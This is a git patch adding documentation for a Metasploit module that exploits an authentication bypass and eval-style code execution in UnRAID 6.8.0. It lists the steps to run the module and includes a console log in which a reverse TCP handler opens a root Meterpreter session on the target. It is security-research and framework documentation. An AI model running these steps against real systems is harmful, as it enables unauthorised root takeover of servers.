From 4975b8d89444ca302bdf290dcfa53ae967f264f6 Mon Sep 17 00:00:00 2001
From: Nicolas Chatelain <n.chatelain@sysdream.com>
Date: Fri, 20 Mar 2020 15:33:20 +0100
Subject: [PATCH] Add unraid exploit documentation

---
 .../modules/exploit/linux/http/unraid_eval.md | 45 +++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/unraid_eval.md

diff --git a/documentation/modules/exploit/linux/http/unraid_eval.md b/documentation/modules/exploit/linux/http/unraid_eval.md
new file mode 100644
index 0000000000..155b88728e
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/unraid_eval.md
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password.
+
+### Description
+
+This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
+performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
+
+### Testing Environment
+
+Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
+according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
+
+## Verification Steps
+
+  1. Setup UnRAID 6.8.0
+  2. Start `msfconsole`
+  3. `use exploit/linux/http/unraid_eval`
+  4. `set RHOST [UNRAID]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+## Options
+
+None.
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/unraid_eval
+msf5 exploit(linux/http/unraid_eval) > set RHOSTS 10.10.0.173
+RHOSTS => 10.10.0.173
+msf5 exploit(linux/http/unraid_eval) > check
+[*] 10.10.0.173:80 - The target appears to be vulnerable.
+msf5 exploit(linux/http/unraid_eval) > run
+
+[*] Started reverse TCP handler on 10.10.0.161:4444 
+[*] Sending stage (38288 bytes) to 10.10.0.173
+[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
+
+meterpreter > getuid
+Server username: root (0)
+```